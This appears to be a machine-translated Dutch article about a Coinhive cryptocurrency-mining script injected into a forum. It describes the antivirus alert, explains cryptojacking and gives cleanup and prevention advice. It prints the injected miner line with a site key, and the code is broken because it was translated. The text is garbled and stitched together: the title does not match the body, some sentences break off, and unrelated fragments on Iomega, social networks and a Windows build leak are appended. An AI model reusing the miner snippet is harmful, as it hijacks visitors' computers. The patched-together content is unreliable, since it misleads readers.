UFC Fight Pass Web Page Mining Bitcoin With Users Computers. Coinhive Strikes Again!
Inhoudsopgave:
Ik heb gelezen over website-eigenaren die scripts gebruiken op hun websites die de CPU van de computer van de bezoeker gebruiken wanneer zij hun website bezoeken. Het idee is om inkomsten te genereren met hun inhoud - en dus gebruiken ze in plaats van advertenties, een script dat in de browser wordt uitgevoerd en de computerbronnen van de gebruiker gebruikt om cryptocurrency te minen. Maar ik dacht altijd dat alleen website-eigenaren dit per ontwerp deden - ik had nooit gedacht dat hackers websites zouden hacken en het script naar andere websites zouden sturen en hun bezoekers-CPU zouden gebruiken om geld voor zichzelf te verdienen. Maar dit is wat er nu lijkt te gebeuren!
Script voor crypto-mining script
Gisteren, toen ik ons TWC-forum bezocht, dat op vBulletin-software draait, gaf mijn beveiligingssoftware deze waarschuwing:
// coinhive dot com /lib/coinhive.js Objectbestand gedetecteerd, download geblokkeerd
Ik bezoek het forum meestal elke dag en ik had het de dag ervoor niet gezien. Dus ik neem aan dat dit een tijdje gebeurde tijdens de nacht, mijn tijd, toen ik sliep.
Ik gebruik vBulletin-software voor het forum en het is bijgewerkt naar de nieuwste versie. Bovendien was dit nogal verrassend voor ons, omdat het Windows-domein gebruikt Sucuri Web Antivirus & Firewall om zichzelf te beschermen tegen online webbedreigingen en -aanvallen.
Mijn pc-beveiligingssoftware heeft met succes het kwaadwillende script gestopt op mijn Windows 10-computer. Ik controleerde met andere browsers zoals Chrome & Edge en de resultaten waren hetzelfde.
Nadat ik met de rechtermuisknop op de forumwebpagina had geklikt en de broncode had gecontroleerd, ontdekte ik dat het een CryptoMiner kwaadaardig script van CoinHive was.
Dit is de kwaadaardige Coinhive Javascript die in mijn forumcode was gekomen:
var mijnwerker = nieuwe CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
Hoe dan ook, het eerste wat ik deed was om de forum naar beneden en informeer Sucuri. Wat is CoinHive Aanbiedingen een JavaScript-mijnwerker voor de Monero-cryptocurrency die u kunt insluiten in uw website en de CPU van website-bezoekerscomputers kunt gebruiken om munten voor u te delven. Cryptojacking genoemd. Het gaat om het kapen van de browsers van gebruikers voor cryptocurrency-mining. Sommige website-eigenaren kunnen het zelf gebruiken om geld te verdienen - maar in ons geval was het geïnjecteerd. Wanneer een gebruiker de geïnfecteerde site opent, voert de Coinhive JavaScript Monero uit met behulp van de CPU-bronnen van de gebruiker. Dit kan leiden tot CPU-beperking en onverwachte systeemcrash van de machine van het slachtoffer. Nu, als uw browser is geïnfecteerd, zult u zien dat het gebruik van uw bronnen omhoog gaat. Sluit de browser en deze zal verdwijnen. De gebruiker kan merken dat zijn machine opwarmt, de ventilator snel loopt of de batterij snel leegloopt. Ik vroeg mijn collega Saurabh Mukhekar om mijn forum te bezoeken met zijn Mac en te kijken wat er gebeurde. Nou, zijn Mac-computer was ook getroffen toen hij het forum opende met Safari! Hij is een van die slimme Mac OSX-gebruikers die een antivirussoftware voor zijn Mac gebruikt. Zijn Avast-antivirus voor Mac stopte het kwaadwillende script met succes. Said Saurabh, De CoinsHive-malware kaping niet alleen een Windows-pc, maar ook de Mac, omdat het een browsergebaseerde Javascript-infectie is. Het is goed, ik geloof niet in de mythe dat Macs geen antivirussoftware nodig hebben, anders zou mijn machine zijn geïnfecteerd en zou mijn Mac doorgaan met het verzamelen van munten voor iemand anders. Voorkom dat CoinHive uw website infecteert Gebruik geen NULL-sjablonen of -plug-ins op uw website / forum. Broncode bekijken . Druk vervolgens op Ctrl + F en zoek naar "CoinHive". Nadat u de locatie van de kwaadwillige code hebt geïdentificeerd, moet u de positie bekijken - waar bevindt deze zich. Nu moet je het handmatig verwijderen. Hiervoor hebt u een beetje codeerkennis van uw platform nodig. U zult het geïnfecteerde bestand (en) moeten vinden en handmatig het bovenstaande script eruit verwijderen. Als je het niet zeker weet, vraag het dan aan een expert. Omdat we Sucuri gebruiken, laten we ze het doen. Als je dat hebt gedaan, wis je je server- en browsercache. Als u een cache-plug-in gebruikt of MaxCDN zegt, wis die caches dan ook. Bescherm uzelf tegen crypto mining-scripts Cryptocurrencies en Blockchain-technologie nemen de wereld over. Het creëert een impact op de wereldeconomie en veroorzaakt ook technologische storingen. Iedereen is zich gaan richten op zo`n lucratieve markt - en dit omvat ook website-hackers. Naarmate het rendement stijgt, kunnen we verwachten dat dergelijke technologieën worden misbruikt. Dat is de duistere kant van elke opkomende technologie. Uit overvloedige voorzorgsmaatregelen, als u ooit het gevoel hebt gehad dat u een geïnfecteerde site hebt bezocht, is het een goed idee om uw browser leeg te maken. cache en scan uw machine met uw antivirussoftware en AdwCleaner.Dit wordt
Houd uw CMS bijgewerkt naar de nieuwste versie.
Nu wanneer uw antivirus de infectie met de munt vindt, klikt u met de rechtermuisknop op de webpagina en selecteert u
Blijf veilig, blijf alert!
Iomega helpt u bij het klonen van uw systeem - en speelt ook media Bijna twee jaar zijn verstreken sinds Iomega en EMC (bekend van zijn back-up software) zich aansloten en het nieuwste aanbod van Iomega weerspiegelt de huidige focus van het bedrijf op integratie van de hardware en software-ervaring. Iomega's nieuwe v.Clone, hier geïntroduc
Virtualisatiesoftware is natuurlijk niet nieuw en verschillende fabrikanten hebben al eerder geprobeerd zorgen voor virtualisatie op een USB-flashstation. Het verschil hier is dat het een mainstream leverancier van harde schijven is die virtualisatie biedt voor consumenten - en dat doet op iets dat veel groter is dan een schamele flashdrive die nauwelijks je internetfavorieten en e-mail kan verwerken.
We besteden veel tijd aan het doorlezen van sociale netwerksites, maar dat is niet genoeg Dat betekent dat we allemaal sociale vlinders zijn. Het lijkt erop dat e-mail het nieuws van gisteren is geworden. Terwijl het controleren van e-mail vroeger onze belangrijkste reden was om online te gaan, besteden we nu meer van onze online tijd aan het surfen op sociale netwerken, volgens nieuwe nummers van Nielsen. We spenderen 23 procent van onze online tijd aan surfen op sociale netwerken zoals Faceboo
Dat nieuws hoeft mij niet per se te verbazen: ik kan 10 minuten doorbrengen op Facebook en verstrikt raken in de activiteiten van 25 verschillende mensen, terwijl het besteden van diezelfde 10 minuten aan e-mail me in staat zou stellen om veel nutteloze junkmail te verwijderen en misschien een bericht te lezen. Maar als ik echt stop om erover na te denken, houdt Facebook me niet echt beter verbonden met de meeste mensen. Hier zijn vijf redenen waarom.
Een vroege build van Microsoft's grote Windows 8-update is op het web verschenen , vol met handige nieuwe trucs en hints van geweldige inkomende functies. <> Na een overvloed aan geruchten, fluisteringen en missers in vacatures, hebben we nu concretere bewijzen van het gesloten Windows Blue-besturingssysteem van Microsoft: een eerlijke -goedheid lek van een vroege build van het besturingssysteem.
Het lek van "Windows Build 9364" verscheen zondagochtend op torrent- en bestandsdelingssites in de vorm van een 2,6 GB ISO-bestand en het nieuws van het lek brak over het net als een lopend vuurtje na een eerste verschijning op Windows 9 Beta. Hoewel Microsoft geen formele verklaring heeft afgelegd over het lek, is het hands-on ontleed door WinSuperSite en talloze forumbezoekers, en Build 9364 lijkt een 100 procent legitieme (en 100 procent ongeoorloofde) kijk op de toekomst van Windows.